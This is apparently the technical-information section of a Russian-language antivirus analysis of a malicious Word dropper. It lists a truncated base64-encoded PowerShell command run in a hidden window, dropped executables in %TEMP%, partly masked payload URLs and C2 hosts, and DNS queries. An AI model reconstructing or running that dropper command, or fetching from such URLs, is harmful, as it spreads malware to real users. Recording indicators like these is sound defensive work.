Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG8AbwBfAG0ANQBrAD0AKAAoACcAQwB2AGIAJwArACcAZQAnACkAKwAoACcAeQAnACsAJwBiAGwAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AFQARQBtAHAAXABXAE8AUgBEAFwAMgAwAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\584863.cvr
- %TEMP%\word\2019\lki6mun.exe
- %TEMP%\word\2019\lki6mun.exe
- 'dr######emyrtlebeach.com':80
- 'dr######emyrtlebeach.com':443
- 'ne#.#ittyg.com':80
- 'om###help.net':80
- 'pr####tinternet.com':80
- 'na####roject.com':443
- http://dr######emyrtlebeach.com/wp-content/cache/2Rw/
- http://ne#.#ittyg.com/cgi-bin/L7v/
- http://om###help.net/tom/d/
- http://pr####tinternet.com/12_(+/LF/
- 'dr######emyrtlebeach.com':443
- 'na####roject.com':443
- DNS ASK dr######emyrtlebeach.com
- DNS ASK ne#.#ittyg.com
- DNS ASK om###help.net
- DNS ASK pr####tinternet.com
- DNS ASK me###huzhai.com
- DNS ASK di#####cbuikhien.com
- DNS ASK na####roject.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG8AbwBfAG0ANQBrAD0AKAAoACcAQwB2AGIAJwArACcAZQAnACkAKwAoACcAeQAnACsAJwBiAGwAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AFQARQBtAHAAXABXAE8AUgBEAFwAMgAwAD... (со скрытым окном)